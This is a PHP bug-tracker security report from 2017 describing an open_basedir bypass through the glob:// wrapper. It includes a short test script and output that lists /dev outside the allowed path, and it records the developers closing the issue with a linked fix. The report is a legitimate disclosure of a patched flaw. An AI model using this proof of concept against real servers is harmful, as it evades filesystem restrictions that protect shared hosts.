php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #73891 open_basedir bypass through glob:// protocol
Submitted: 2017-01-08 21:20 UTC Modified: 2017-01-10 00:19 UTC
From: max at cert dot cx Assigned: pollita (profile)
Status: Closed Package: *General Issues
PHP Version: 7.1.0 OS: BSD
Private report: No CVE-ID: None
 [2017-01-08 21:20 UTC] max at cert dot cx
Description:
------------
open_basedir bypass through glob:// protocol may allow attacker read directory structure

# ./php -v
PHP 7.1.0 (cli) (built: Dec 23 2016 16:08:30) ( NTS DEBUG )
Copyright (c) 1997-2016 The PHP Group
Zend Engine v3.1.0-dev, Copyright (c) 1998-2016 Zend Technologies


Test script:
---------------
<?php
    if ($dh = opendir($argv[1])) {
        while (($file = readdir($dh)) !== false) {
            echo "$file\n";
        }
        closedir($dh);
    }


Expected result:
----------------
Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2

Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2

Actual result:
--------------
# ./php bypass.php "/dev/"         

Warning: opendir(): open_basedir restriction in effect. File(/dev/) is not within the allowed path(s): (/virtual/) in /virtual/php/71/bin/bypass.php on line 2

Warning: opendir(/dev/): failed to open dir: Operation not permitted in /virtual/php/71/bin/bypass.php on line 2
# ./php bypass.php "glob:///dev/*" 
MAKEDEV
apm
apmctl
arandom
audio
audio0
audio1
audio2
audioctl
audioctl0
audioctl1
audioctl2
bio
bktr0
...
etc

Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2017-01-08 23:49 UTC] max at cert dot cx
Tested on 7.1 and 5.6. Credit: Maksymilian Arciemowicz
 [2017-01-09 17:29 UTC] leigh@php.net
-Status: Open +Status: Duplicate
 [2017-01-09 17:29 UTC] leigh@php.net
Duplicate of 73710
 [2017-01-09 18:47 UTC] pollita@php.net
-Assigned To: +Assigned To: pollita
 [2017-01-10 00:17 UTC] pollita@php.net
-Status: Duplicate +Status: Closed
 [2017-01-10 00:17 UTC] pollita@php.net
The fix for this bug has been committed.

Snapshots of the sources are packaged every three hours; this change
will be in the next snapshot. You can grab the snapshot at
http://snaps.php.net/.

 For Windows:

http://windows.php.net/snapshots/
 
Thank you for the report, and for helping us make PHP better.

https://github.com/php/php-src/commit/7e49e8e7970b423968de7a53ea9a0796f4634276
 
PHP Copyright © 2001-2021 The PHP Group
All rights reserved.
Last updated: Thu Dec 09 11:03:34 2021 UTC